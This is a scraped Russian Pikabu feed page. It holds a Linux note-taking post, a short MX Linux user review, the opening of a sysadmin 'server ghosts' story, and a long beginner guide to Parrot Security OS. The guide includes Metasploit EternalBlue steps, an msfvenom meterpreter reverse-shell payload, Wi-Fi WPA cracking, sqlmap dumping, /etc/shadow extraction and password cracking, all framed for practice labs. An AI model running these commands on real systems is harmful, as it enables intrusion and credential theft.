Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр
Сыграйте в классический пасьянс и попробуйте разложить по порядку колоду из 52 карт, начиная с короля и заканчивая тузом. Игра имеет четыре варианта: с 1, 2, 3 и 4 мастями. Выиграйте как можно больше в каждом варианте и улучшите свои показатели.

Пасьянс Паук «Классический»

Карточные, Логическая, Мобильная

Играть

Топ прошлой недели

  • Rahlkan Rahlkan 1 пост
  • Tannhauser9 Tannhauser9 4 поста
  • alex.carrier alex.carrier 5 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
Avenir.Sirgun
Avenir.Sirgun
3 месяца назад
GNU/Linux
Серия Linux

Как делать конспекты. Два способа⁠⁠

Конспекты делать полезно. Подписывайтесь здесь и в вк.
Я иногда буду публиковать статейки оригинальные, не копипаста.

Варианты


1). helix, orbiton + markdown server .
на выходе md файлы.
потом запихиваю это в Obsidian или другой markdown editor.

или
2). latex , scribus , libreoffice .
на выходе pdf ки.

1 способ - более переносимый,
тк мд файлы читаются везде и они с форматированием, картинками таблицами, юююююю.
Любой браузер отобразит markdown (md) файлы красиво.

UPD
helix и orbiton текстовые редакторы,
работающие в консоли операционной системы linux.
C их уникальными свойствами можно ознакомиться на страницах авторов.
Зачем два ?
Хватает одного, но один может понравиться больше другого.


больше подробностей в обсуждениях.

UPD:

При использовании материалов вы должны дать ссылку на этот оригинал.

[моё] Linux Компьютерная помощь Конспект Книги Linux mint Windows Текст
12
Seberd.ITBase
Seberd.ITBase
3 месяца назад

Ваш надёжный спутник в мире информационной безопасности Parrot Security OS⁠⁠

Если вы новичок в сфере информационной безопасности или уже опытный специалист, ищущий удобный и мощный инструмент для работы, Parrot Security OS может стать вашим идеальным выбором. Этот Linux-дистрибутив, созданный с акцентом на безопасность и конфиденциальность, предоставляет огромный набор инструментов, утилит и библиотек, которые помогут проводить надёжное, соответствующее требованиям и воспроизводимое тестирование и оценку безопасности ваших активов. В этой статье я расскажу, что делает Parrot Security OS особенным, как начать с ним работать, какие трудности могут возникнуть и как их преодолеть. Вы также узнаете, как добиться первых результатов, познакомитесь с популярными инструментами, получите практические советы для дальнейшего изучения и узнаете, как восстановить систему после сбоев.

Ваш надёжный спутник в мире информационной безопасности Parrot Security OS Программа, Информационная безопасность, Linux, Гайд, Windows, Telegram (ссылка), Длиннопост

parrotsec.org

Если вам интересны реальные случаи взломов, разборы киберугроз и методы защиты, присоединяйтесь к Telegram-каналу Security Controls (@scontrolss).

Что такое Parrot Security OS и почему он важен для информационной безопасности

Parrot Security OS — это Linux-дистрибутив, основанный на Debian, разработанный итальянской командой Frozenbox. Он ориентирован на специалистов в области информационной безопасности, разработчиков и тех, кто ценит конфиденциальность. В отличие от более известного Kali Linux, Parrot делает акцент не только на тестирование на проникновение (penetration testing), но и на анонимность, защиту данных и цифровую криминалистику. Дистрибутив поставляется с предустановленным набором инструментов, таких как Metasploit, Nmap, Wireshark и Aircrack-ng, которые сгруппированы по категориям: сканирование, эксплуатация уязвимостей, анализ трафика и защита конфиденциальности.

Parrot Security OS выделяется своей универсальностью. Согласно официальным системным требованиям (по состоянию на апрель 2025 года), для Parrot Security Edition рекомендуется минимум 2 ГБ оперативной памяти для комфортной работы, хотя система может запускаться и на машинах с 1 ГБ, но с заметными ограничениями, такими как медленная работа графического интерфейса или невозможность запускать несколько инструментов одновременно. Для современных задач, таких как анализ больших дампов трафика или работа с Metasploit, лучше иметь 4 ГБ оперативной памяти и выше. Это делает Parrot подходящим для пользователей с ограниченными ресурсами, но для оптимальной производительности стоит учитывать актуальные требования. Например, на ноутбуке с 2 ГБ оперативной памяти Parrot будет работать, но запуск Burp Suite и Wireshark одновременно может вызвать задержки. Parrot также поддерживает анонимность "из коробки": встроенные инструменты, такие как Tor и AnonSurf, позволяют скрывать ваш IP-адрес и защищать данные при работе в интернете. Это особенно полезно для тех, кто хочет минимизировать цифровой след во время тестирования или исследований.

По сравнению с Windows, где для выполнения задач безопасности нужно устанавливать и настраивать каждую программу вручную, Parrot Security OS экономит время. Например, установка Wireshark на Windows требует загрузки установщика, проверки совместимости и настройки прав доступа, что может занять 10–15 минут. В Parrot всё уже готово: вы просто открываете терминал и вводите команду, чтобы начать анализ трафика (подробности ниже). Более того, Parrot позволяет легко обновлять все инструменты через менеджер пакетов apt, что снижает вероятность ошибок. Команда sudo apt update && sudo apt upgrade обновит не только систему, но и все установленные инструменты, такие как Nmap или Metasploit, до последних версий.

Но Parrot Security OS — это не только про инструменты. Важно выбрать дистрибутив, который будет вам удобен. Если вам нужна система с акцентом на анонимность и меньшим потреблением ресурсов, Parrot — ваш вариант. Если же вам интересны исключительно атаки, можно рассмотреть Kali Linux, а для цифровой криминалистики подойдёт DEFT Linux. Также есть альтернативы, такие как BlackArch Linux, который предлагает ещё больше инструментов (более 2800), но требует больше времени на освоение, или BackBox, который проще для новичков, но менее функционален, чем Parrot.

Важно помнить, что Linux, включая Parrot, не полностью защищён от угроз. По данным 2019 года, число вредоносных программ для Linux выросло на 50% по сравнению с 2018 годом, особенно для серверов. На домашних устройствах такие угрозы встречаются реже, но всё же важно обновлять систему (sudo apt update && sudo apt upgrade), использовать сложные пароли и избегать запуска непроверенных скриптов. Например, если вы скачали скрипт из интернета, проверьте его содержимое с помощью cat script.sh, прежде чем запускать. Также рекомендуется настроить брандмауэр UFW: sudo ufw enable включит его, а sudo ufw allow ssh разрешит доступ по SSH, чтобы не заблокировать важные соединения.

Обзор версий Parrot Security OS

Parrot Security OS предлагает несколько редакций, чтобы соответствовать разным потребностям. Основная версия — Parrot Security Edition — предназначена для специалистов по безопасности. Она включает более 600 инструментов для тестирования на проникновение, анализа сетей и защиты данных. Parrot Home Edition создана для повседневного использования: она легче, не перегружена специализированными утилитами и подойдёт тем, кто хочет использовать Parrot как основную систему с возможностью установки нужных инструментов по мере необходимости. Parrot Architect Edition предназначена для опытных пользователей, которые хотят собрать систему с нуля, выбрав только необходимые компоненты.

Parrot Security Edition — это основа для задач информационной безопасности. Здесь вы найдёте Nmap для сканирования сетей, Metasploit для проверки уязвимостей, Burp Suite для анализа веб-приложений и инструменты для анонимности, такие как Tor. Parrot также поддерживает контейнеры Docker — это платформа для создания изолированных сред (контейнеров), где можно запускать приложения без влияния на основную систему. Например, вы можете развернуть уязвимый веб-сервер в Docker и практиковаться в эксплуатации уязвимостей, не затрагивая вашу сеть. Для установки Docker выполните sudo apt install docker.io, затем запустите контейнер с уязвимым приложением: sudo docker run -d -p 80:80 vulnerables/web-dvwa. Теперь вы можете открыть браузер и перейти на http://localhost для практики. После запуска DVWA нужно настроить пароль для базы данных: выполните sudo docker exec -it <container_id> mysql -u root -p, введите пароль по умолчанию (обычно пустой), затем задайте новый пароль командой ALTER USER 'root'@'localhost' IDENTIFIED BY 'newpassword';. Перезапустите контейнер: sudo docker restart <container_id>.

Parrot интегрирует инструменты для защиты конфиденциальности лучше, чем многие другие дистрибутивы. AnonSurf перенаправляет весь ваш трафик через Tor с помощью одной команды: sudo anonsurf start. Это полезно, если вы хотите скрыть свою активность в интернете. Однако помните, что Tor замедляет соединение, так как трафик проходит через несколько узлов. Если анонимность не требуется, вы можете отключить AnonSurf командой sudo anonsurf stop. Также Parrot включает I2P для дополнительной анонимности: установите его через sudo apt install i2p и запустите i2prouter start. Это создаёт ещё один слой защиты, особенно если вы работаете с чувствительными данными.

Для тех, кто хочет использовать Parrot как основную систему, Home Edition предлагает браузеры, офисные приложения (например, LibreOffice) и мультимедийные инструменты, такие как VLC. Вы можете установить их в Security Edition, если нужно: sudo apt install libreoffice vlc. Это делает Parrot более универсальным, чем многие другие дистрибутивы для пентестинга.

Как выбрать окружение рабочего стола

Parrot Security OS предлагает несколько окружений рабочего стола. По умолчанию используется MATE — лёгкая и функциональная среда, которая хорошо работает даже на слабых машинах. MATE предоставляет панель задач, меню приложений и простой рабочий стол, что делает его интуитивно понятным для новичков. Например, в меню приложений инструменты для пентестинга удобно сгруппированы по категориям: "Сканирование", "Эксплуатация", "Анонимность".

Если вы предпочитаете современный интерфейс, можно установить GNOME: введите sudo apt install parrot-desktop-gnome и выберите GNOME при входе в систему. GNOME выглядит стильно, но требует больше ресурсов — около 2 ГБ оперативной памяти для плавной работы.

Для тех, кто любит кастомизацию, подойдёт KDE Plasma (sudo apt install parrot-desktop-kde): вы можете настроить всё, от тем оформления до виджетов на рабочем столе, таких как мониторинг системы или погода.

Если вы переходите с Windows, MATE может показаться ближе по духу, так как его интерфейс напоминает классические версии Windows, такие как XP. GNOME, напротив, больше похож на macOS с его панелью Dash и минималистичным дизайном. KDE Plasma подойдёт тем, кто привык к Windows 10/11 и любит настраивать всё под себя: например, вы можете добавить виджет с часами или индикатором загрузки процессора прямо на рабочий стол.

Выбирайте окружение в зависимости от ваших предпочтений и мощности устройства. Для старого ноутбука с 2 ГБ оперативной памяти MATE — лучший выбор. Если у вас современный компьютер с 8 ГБ оперативной памяти и выше, попробуйте GNOME или KDE для более приятного визуального опыта. Чтобы проверить, сколько ресурсов потребляет ваша система, используйте htop (sudo apt install htop): запустите его в терминале и посмотрите, сколько оперативной памяти занято после загрузки.

Как установить Parrot Security OS

Виртуальная машина для безопасного запуска

Виртуальная машина (VM) — отличный способ попробовать Parrot Security OS, не затрагивая вашу основную систему. Используйте VirtualBox, доступный для бесплатной загрузки с официального сайта (virtualbox.org). Если вы на Windows 10 или 11, можно задействовать встроенный Hyper-V: включите его через "Программы и компоненты" → "Компоненты Windows", затем создайте машину в Hyper-V Manager. Убедитесь, что в BIOS включена виртуализация (VT-x для Intel или AMD-V для AMD), обычно в разделе "Advanced" или "CPU Configuration". Если виртуализация не включена, VirtualBox выдаст ошибку при запуске — проверьте настройки BIOS, перезагрузив компьютер и нажав F2, Del или другую клавишу, указанную производителем.

Скачайте ISO-образ Parrot Security Edition с официального сайта (parrotsec.org) и проверьте контрольную сумму (SHA256), чтобы убедиться в безопасности файла. На сайте Parrot есть инструкции, как это сделать с помощью sha256sum в Linux или CertUtil в Windows. В VirtualBox создайте новую машину, выбрав тип "Linux" и версию "Debian 64-bit". Выделите минимум 2 ГБ оперативной памяти и 20 ГБ пространства на диске, но лучше 4 ГБ и 40 ГБ для работы с инструментами, особенно если вы планируете сохранять большие дампы трафика Wireshark или работать с контейнерами Docker. Укажите ISO-образ и начните установку, выбрав язык, часовой пояс и пароль. Во время установки вам предложат выбрать раздел диска — если вы не уверены, оставьте настройки по умолчанию, чтобы установщик сам создал необходимые разделы.

После установки настройте сеть в VirtualBox: выберите "Сетевой мост" (Bridged Adapter) в настройках машины, чтобы Parrot получил доступ к интернету. Сетевой мост позволяет виртуальной машине использовать IP-адрес вашей основной сети, как если бы она была отдельным устройством в этой сети. Это полезно для тестирования сетевых инструментов, таких как Nmap. Проверьте подключение, введя в терминале ping google.com. Если пакеты не проходят, проверьте настройки сети вашей хост-системы или переключитесь на NAT в настройках VirtualBox.

Режим Live USB для гибкости

Для тестирования без установки используйте режим Live USB. Запишите ISO на флешку с помощью Rufus (для Windows) или Etcher (для macOS/Linux). Учтите, что это удалит все данные на флешке, поэтому сохраните важные файлы заранее. Если вы хотите использовать флешку для нескольких дистрибутивов, попробуйте Ventoy: установите его на флешку, затем просто скопируйте ISO-образ Parrot в корень флешки. Ventoy позволяет загружать несколько ISO-образов, переключаясь между ними в меню загрузки.

Перезагрузите компьютер, войдите в BIOS/UEFI (обычно клавиши F2, F12 или Del) и выберите флешку как устройство загрузки. В меню Parrot выберите "Live mode", чтобы запустить систему без установки. Live-режим сохраняет все изменения в оперативной памяти, поэтому после перезагрузки данные не сохранятся. Если вы хотите сохранять файлы, создайте постоянное хранилище (Persistence): в меню загрузки выберите "Live with Persistence" и следуйте инструкциям установщика, выделив часть флешки для хранения данных.

Установка рядом с Windows (Dual Boot)

Чтобы установить Parrot рядом с Windows, подготовьте место на диске. В Windows откройте "Управление дисками" (Win+R, введите diskmgmt.msc), щёлкните правой кнопкой мыши на диске C: и выберите "Сжать том". Выделите минимум 20 ГБ, но лучше 40–50 ГБ для больших файлов, таких как дампы трафика или образы дисков для криминалистики. Создайте загрузочную флешку с помощью Ventoy: скачайте его с официального сайта (ventoy.net), установите на флешку и скопируйте ISO-образ Parrot. Перезагрузите компьютер, выберите флешку в BIOS/UEFI, запустите установку, выбрав неразмеченное пространство. Установщик создаст разделы и добавит загрузчик GRUB — это программа, которая позволяет выбирать операционную систему при запуске компьютера, например, Windows или Parrot.

После установки GRUB может не отображать Windows в меню загрузки. В этом случае загрузитесь в Parrot и обновите GRUB: sudo update-grub. Если Windows всё ещё не отображается, установите os-prober (sudo apt install os-prober) и повторите команду. Также настройте порядок загрузки в BIOS, чтобы GRUB загружался первым.

Установка на внешний SSD

Если вы хотите использовать Parrot на нескольких устройствах или сохранить больше данных, можно установить его на внешний SSD. Подключите SSD к компьютеру, создайте загрузочный носитель (например, флешку с Ventoy), загрузитесь с неё и выберите SSD как целевой диск во время установки. Убедитесь, что в BIOS/UEFI включена загрузка с внешних устройств. После установки вы сможете подключать SSD к любому компьютеру и загружать Parrot, выбрав SSD в меню загрузки BIOS. Для удобства настройте GRUB на SSD, чтобы он автоматически находил другие операционные системы: sudo update-grub.

Основные отличия Parrot Security OS от Windows

Переход с Windows на Parrot может быть непривычным. В Windows вы привыкли к графическому интерфейсу, а в Parrot основная работа проходит в терминале. Откройте терминал через меню приложений (в MATE это значок с чёрным экраном) и обновите систему: sudo apt update && sudo apt upgrade. Команда sudo даёт права администратора, как "Запуск от имени администратора" в Windows. Если вы забыли, какие команды ввели, используйте history в терминале, чтобы просмотреть последние команды.

Файловая система в Parrot отличается от Windows. Вместо дисков C: и D: всё организовано в иерархию, начиная с /. Ваша домашняя папка — /home/имя_пользователя, системные файлы лежат в /etc (конфигурации) или /var (логи). Для поиска файлов используйте find / -name "имя_файла" 2>/dev/null, например, find / -name "report.txt" 2>/dev/null. Если вам удобнее графический интерфейс, установите файловый менеджер, такой как Thunar (sudo apt install thunar), который позволяет просматривать файлы, как в Проводнике Windows.

Управление программами тоже другое. В Windows вы устанавливаете .exe-файлы, а в Parrot используется менеджер пакетов apt. Установите Burp Suite командой sudo apt install burp-suite. Для удаления используйте sudo apt remove burp-suite или sudo apt purge burp-suite, чтобы удалить и конфигурации. Если вам нужно установить программу, которой нет в репозиториях, например, новейшую версию Nmap, скачайте её с официального сайта (nmap.org) и соберите из исходников: tar -xvf nmap.tar.gz && cd nmap && ./configure && make && sudo make install.

Windows часто автоматически устанавливает обновления, что может быть неудобно. В Parrot вы сами решаете, когда обновляться: sudo apt update проверяет доступные обновления, а sudo apt upgrade устанавливает их. Если вы хотите автоматизировать процесс, настройте unattended-upgrades: sudo apt install unattended-upgrades и включите его командой sudo dpkg-reconfigure unattended-upgrades.

Основные отличия Parrot Security OS от Kali Linux

Хотя Parrot Security OS и Kali Linux — оба дистрибутива, ориентированных на задачи информационной безопасности, у них есть ключевые различия, которые могут повлиять на ваш выбор. Parrot делает больший акцент на универсальность и конфиденциальность, тогда как Kali ориентирован в первую очередь на тестирование на проникновение (penetration testing).

Parrot Security OS поставляется с предустановленными инструментами для анонимности, такими как AnonSurf и Tor, которые можно включить одной командой (sudo anonsurf start). Это позволяет скрыть ваш IP-адрес и защитить данные без дополнительных настроек. В Kali Linux такие функции тоже можно настроить, но они не интегрированы так глубоко: вам нужно будет устанавливать и настраивать Tor или другие инструменты вручную, что требует больше времени и опыта. Например, в Kali для маршрутизации трафика через Tor нужно настроить proxychains, что сложнее, чем использование AnonSurf.

Kali Linux больше ориентирован на профессионалов в области пентестинга, и его интерфейс (по умолчанию Xfce) может показаться новичкам менее дружелюбным. Parrot, с другой стороны, предлагает более универсальный подход: его Security Edition подойдёт для специалистов, а Home Edition — для повседневного использования. По умолчанию Parrot использует окружение MATE, которое проще и интуитивнее для тех, кто только начинает работать с Linux. Например, меню приложений в MATE организовано по категориям, что облегчает поиск нужных инструментов.

Kali Linux имеет более крупное сообщество, так как это один из самых популярных дистрибутивов для пентестинга. Вы легко найдёте обучающие материалы, форумы и видеоуроки по Kali на таких платформах, как YouTube или Reddit (например, r/kalilinux). Parrot, хотя и набирает популярность, имеет меньшее сообщество, но его разработчики активно поддерживают пользователей через официальный форum (community.parrotsec.org) и Telegram-каналы. Если вы новичок, это может повлиять на скорость поиска решений: для Kali ответы на вопросы обычно находятся быстрее.

Выбор между Parrot и Kali зависит от ваших целей. Если вам нужна система для атак и тестирования уязвимостей, Kali может быть предпочтительнее. Если же вы хотите сбалансированный дистрибутив с акцентом на анонимность, меньшим потреблением ресурсов и универсальностью, Parrot Security OS — ваш вариант.

Популярные инструменты Parrot Security OS для тестирования безопасности

Parrot Security OS поставляется с множеством предустановленных инструментов, которые помогут вам начать тестирование безопасности. Вот 10 популярных утилит, с которых можно начать, и примеры их использования. Все команды выполняйте в тестовой среде, например, с Metasploitable или DVWA (Damn Vulnerable Web Application), чтобы не нарушить закон.

  1. Nmap — инструмент для сканирования сетей. Установлен по умолчанию. Выполните nmap 192.168.1.1-254, чтобы найти устройства в вашей сети. Для более детального сканирования используйте флаги: nmap -sV -p- 192.168.1.10 покажет версии сервисов и просканирует все порты. Если устройство не отвечает, добавьте -Pn: nmap -Pn 192.168.1.10. Сохраните результаты в файл: nmap 192.168.1.1-254 -oN scan.txt.

  2. Wireshark — анализатор трафика. Чтобы запускать Wireshark без sudo, добавьте пользователя в группу wireshark: sudo usermod -aG wireshark $USER, затем перелогиньтесь. После этого запустите wireshark, выберите интерфейс (например, eth0) и начните захват пакетов. Используйте фильтр http для просмотра веб-запросов или tcp.port == 22 для анализа SSH-трафика. Для сохранения данных выберите File → Export Objects → HTTP, чтобы извлечь файлы, переданные по HTTP. Это полезно для анализа утечек данных в тестовой среде.

  3. Metasploit Framework — платформа для эксплуатации уязвимостей. Сначала инициализируйте базу данных Metasploit: msfdb init. Это создаст базу данных, необходимую для работы фреймворка, и может занять несколько минут. Затем запустите msfconsole, найдите эксплойт: search eternalblue. Выберите эксплойт командой use exploit/windows/smb/ms17_010_eternalblue, укажите цель (set RHOSTS 192.168.1.10) и запустите exploit. На Metasploitable это может дать вам доступ к системе. Для автоматизации используйте msfvenom, чтобы создать полезную нагрузку: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > payload.exe.

  4. Burp Suite — инструмент для тестирования веб-приложений. Запустите burpsuite, настройте прокси в браузере (обычно 127.0.0.1:8080) и перехватывайте запросы на тестовом сайте, таком как DVWA. Используйте модуль Intruder для перебора паролей: выберите запрос на вход, задайте поле пароля как цель и укажите словарь (/usr/share/wordlists/rockyou.txt). Burp Suite также помогает находить XSS и SQL-инъекции.

  5. Aircrack-ng — инструмент для анализа Wi-Fi. Выполните airmon-ng start wlan0, чтобы перевести Wi-Fi адаптер в режим мониторинга, затем airodump-ng wlan0mon, чтобы захватить пакеты в вашей тестовой Wi-Fi сети. Для взлома пароля WPA используйте aircrack-ng -w /usr/share/wordlists/rockyou.txt -b BSSID capture.cap, где BSSID — адрес точки доступа. Если пароль слабый, Aircrack-ng его раскроет. Для ускорения используйте GPU: установите cuda (sudo apt install aircrack-ng-cuda).

  6. SQLmap — инструмент для поиска SQL-инъекций. На тестовом сайте (например, DVWA) выполните sqlmap -u "http://192.168.1.10/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --dbs. Чтобы получить PHPSESSID, откройте браузер, нажмите F12, перейдите на вкладку "Сеть", выполните запрос на сайт и найдите заголовок Cookie в одном из запросов — скопируйте значение PHPSESSID. SQLmap покажет доступные базы данных, такие как "dvwa". Извлеките данные: sqlmap -u "http://192.168.1.10/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa --dump.

  7. John the Ripper — инструмент для взлома паролей. Словарь rockyou.txt обычно сжат, поэтому сначала распакуйте его: sudo gunzip /usr/share/wordlists/rockyou.txt.gz. Создайте хэш: echo -n "password" | md5sum > hash.txt, затем выполните john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt. Вы получите пароль "password". Для хэшей из /etc/shadow используйте unshadow /etc/passwd /etc/shadow > hash.txt, затем john hash.txt. Если у вас мощный компьютер, включите GPU-поддержку: john --format=raw-md5 --device=0 hash.txt.

  8. Hashcat — инструмент для ускоренного взлома хэшей. Используйте тот же хэш: hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt, где -m 0 — тип хэша MD5, -a 0 — атака по словарю. Для масочной атаки используйте -a 3: hashcat -m 0 -a 3 hash.txt ?l?l?l?l, где ?l — строчные буквы (4-символьный пароль). Проверьте доступные устройства: hashcat -I, чтобы использовать GPU.

  9. Dirb — инструмент для поиска скрытых директорий. По умолчанию используется базовый словарь common.txt, но для более глубокого поиска можно установить seclists: sudo apt install seclists, затем выполните dirb http://192.168.1.10 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt. Вы найдёте папки, такие как /admin или /config. Если сервер отвечает медленно, добавьте паузу: dirb http://192.168.1.10 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -z 100 (задержка 100 мс).

  10. Autopsy — инструмент для цифровой криминалистики. Parrot включает Autopsy для анализа дисков. Запустите autopsy, затем откройте браузер и перейдите на http://localhost:9999/autopsy. Создайте новый кейс, добавьте образ диска (например, с помощью dd: dd if=/dev/sda of=disk.img bs=64k) и анализируйте удалённые файлы, временные метки и подозрительные активности. Autopsy полезен для восстановления данных после инцидентов.

Эти инструменты — лишь малая часть того, что предлагает Parrot. Начните с Nmap и Wireshark, чтобы освоить базовые навыки, затем переходите к более сложным, таким как Metasploit и Autopsy. Всегда тестируйте в безопасной среде, чтобы избежать проблем с законом.

Возможные сложности и способы их преодоления

Работа с терминалом может пугать новичков. Начните с простых команд: ls (показать файлы), cd /home (перейти в домашнюю папку), man apt (справка по команде). Если команда выдаёт ошибку, например "Permission denied", добавьте sudo. Ошибка "Command not found" означает, что программа не установлена — установите её через sudo apt install имя_программы. Например, если sqlmap отсутствует, установите его: sudo apt install sqlmap.

Как добиться первых результатов

Попробуйте простой проект: сканирование сети с помощью Nmap. Найдите ваш IP в Windows через ipconfig (например, 192.168.1.10). В Parrot выполните nmap 192.168.1.1-254, чтобы увидеть устройства и их порты. Порт 80 указывает на веб-сервер — проверьте его в браузере: http://192.168.1.5. Порт 22 (SSH) можно протестировать командой ssh kali@192.168.1.5 (замените IP и имя пользователя). Для более глубокого анализа используйте nmap -A 192.168.1.5, чтобы получить информацию об ОС и сервисах.

Для анализа трафика запустите Wireshark, выберите интерфейс eth0 и используйте фильтр http. Вы увидите веб-запросы в вашей сети. Проверьте логи системы: cat /var/log/auth.log | grep "Failed" покажет неудачные попытки входа. Если вы хотите протестировать веб-уязвимости, настройте DVWA в Docker: sudo docker run -d -p 80:80 vulnerables/web-dvwa. После запуска настройте пароль для базы данных (см. раздел "Обзор версий Parrot Security OS"). Откройте http://localhost в браузере, войдите (admin/password) и попробуйте SQL-инъекцию с помощью SQLmap, как описано выше.

Ещё один полезный проект — проверка анонимности. Включите AnonSurf: sudo anonsurf start, затем проверьте ваш IP: откройте браузер и зайдите на сайт whatismyipaddress.com. Ваш IP должен отличаться от реального. Попробуйте загрузить тестовый файл через Tor и проверьте скорость соединения: wget -O testfile http://speedtest.tele2.net/1MB.zip. Это поможет понять, как анонимность влияет на производительность.

Практические советы для дальнейшего изучения

Практикуйтесь регулярно. После Nmap и Wireshark изучите Metasploit: настройте тестовую среду с Metasploitable и попробуйте эксплойты. Установите Metasploitable в VirtualBox: скачайте образ с официального сайта (sourceforge.net/projects/metasploitable/), создайте новую машину и запустите её. Затем в Parrot запустите msfconsole, найдите эксплойт (search vsftpd) и попробуйте взломать Metasploitable. Это даст вам базовое понимание эксплуатации уязвимостей.

Используйте сообщества, такие как Reddit (r/netsec, r/cybersecurity), чтобы задавать вопросы. Например, если у вас проблемы с Aircrack-ng, опишите ситуацию на r/hacking — там часто дают полезные советы. Также загляните на форум Parrot (community.parrotsec.org), где можно найти решения распространённых проблем, таких как настройка драйверов для Wi-Fi адаптеров.

Ведите заметки в nano ~/notes.txt, записывая команды, например:

  • nmap 192.168.1.1-254 — сканирование сети.

  • sudo anonsurf start — включение анонимности.

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > payload.exe — создание полезной нагрузки.
    Для удобства установите cherrytree (sudo apt install cherrytree) — это графический редактор заметок с поддержкой иерархии, где можно хранить команды, заметки и скриншоты.

Установите tmux (sudo apt install tmux) для работы в нескольких терминалах одновременно и htop (sudo apt install htop) для мониторинга процессов. Например, в tmux нажмите Ctrl+B, затем %, чтобы разделить экран на две панели: в одной запускайте Wireshark, в другой — Nmap. Это удобно для многозадачности.

Для изучения веб-уязвимостей попробуйте Hack The Box (hackthebox.com) или TryHackMe (tryhackme.com). Эти платформы предлагают виртуальные лаборатории с заданиями: от базового сканирования до сложных эксплойтов. Например, в TryHackMe есть бесплатный курс "Learn Linux", который поможет освоить основы терминала, а в Hack The Box вы можете практиковаться в реальных сценариях взлома.

Восстановление системы после сбоев

Сбои в Linux могут происходить из-за некорректных обновлений, ошибок в конфигурации или проблем с оборудованием. Чтобы защитить систему, используйте Timeshift для создания резервных копий. Установите его: sudo apt install timeshift. Запустите timeshift и настройте расписание резервного копирования, выбрав диск или раздел для хранения снимков. Например, создавайте ежедневные снимки вашей системы, исключая папку /home, если там хранятся большие файлы. Если система не загружается после обновления, загрузитесь с Live USB, установите Timeshift и восстановите последний снимок: выберите нужную дату и следуйте инструкциям.

Если вы случайно удалили важные системные файлы, такие как конфигурации GRUB, загрузитесь с Live USB и восстановите их. Для GRUB выполните: sudo mount /dev/sdX /mnt (замените sdX на ваш системный раздел), затем sudo grub-install --root-directory=/mnt /dev/sdX и sudo update-grub. Если данные утеряны, используйте Autopsy (см. выше) для восстановления файлов с диска.

Вы запустили Parrot Security OS, провели базовое сканирование сети и попробовали анонимность — отличный старт! Теперь изучите инструменты, такие как AnonSurf, Nmap и Metasploit, чтобы углубить навыки. Попробуйте настроить тестовую среду с DVWA или Metasploitable, чтобы практиковаться в эксплуатации уязвимостей. Экспериментируйте, создавайте тестовые среды и делитесь опытом в сообществах.

Какое окружение рабочего стола выбрали — MATE, GNOME или KDE Plasma?

#Кибербезопасность #ParrotSecurity #Linux #CyberSecurity

Показать полностью 1
Программа Информационная безопасность Linux Гайд Windows Telegram (ссылка) Длиннопост
5
user9680189
user9680189
3 месяца назад
GNU/Linux
Серия Про Линуксы

Промежуточные итоги моего "линуксоидства"⁠⁠

С момента, когда я "пересел" на МХ Linux прошло уже года два. Что было за это время:

  1. Скажу сразу, системой доволен. Как уже писал где-то, время запуска компа сократилось в несколько раз, про вирусы, троянцы и прочую бубуйню уже забыл напрочь. Плюс ко всему, разрабы из OpenOffice оказались более консервативны, чем покинувшие российский рынок "Майки" и, в отличие от последних, мозго***вом в виде "плиточных интерфейсов" никто не занимается.

  2. Немного насторожило "зависание" с обновлением. Сообщение о релизе версии 23.6 на mxlinux.org "висело" уже несколько месяцев, а обновиться все не получалось. Потом все-таки "зашевелился" процесс обновления и сейчас я пользуюсь вполне актуальной версией.

  3. Из фирменного репозитория разжился еще несколькими программами. Все работает без проблем.

    Да, конечно, можно бы еще поэкспериментировать. Поискать что-то более подходящее. Тем более, что на distrowatch.com тех дистрибутивов, что называется, как у собаки блох. Но сижу я вот и думаю: а зачем менять то, что работает? И работает неплохо?

Linux Компьютер Баг Текст
124
7
DexterHolland53
DexterHolland53
3 месяца назад
Лига Сисадминов

"Серверные призраки: когда техника ведёт себя странно"⁠⁠

Введение: Когда логи не объясняют аномалии

Каждый сисадмин сталкивался с ситуациями, которые нельзя объяснить рационально. Серверы, которые сами перезагружаются по ночам, свитчи, передающие пакеты с выключенных портов, и жёсткие диски, на которых данные появляются из ниоткуда.

В этой статье мы соберём самые загадочные истории из мира IT, которые не поддаются логике. Возможно, это просто баги. А может, в сети живёт что-то ещё…

"Серверные призраки: когда техника ведёт себя странно" Linux, Баг, Ошибка, Компьютерная помощь, Логи, Материнская плата, Операционная система, Сисадмин, Компьютерное железо, Длиннопост

Глава 1. "Фантомные процессы" – кто запускает то, чего не должно быть?

1.1. Таинственный PID 666

Один администратор рассказывал, что на его сервере периодически появлялся процесс с PID 666, который исчезал при попытке его убить. В логах не было ни имени, ни владельца – только пустота.

  • Теория 1: Это демон (в прямом и переносном смысле), который мониторит систему.

  • Теория 2: Артефакт ядра ОС особенно Linux, который проявляется только при определённых условиях.

"Серверные призраки: когда техника ведёт себя странно" Linux, Баг, Ошибка, Компьютерная помощь, Логи, Материнская плата, Операционная система, Сисадмин, Компьютерное железо, Длиннопост

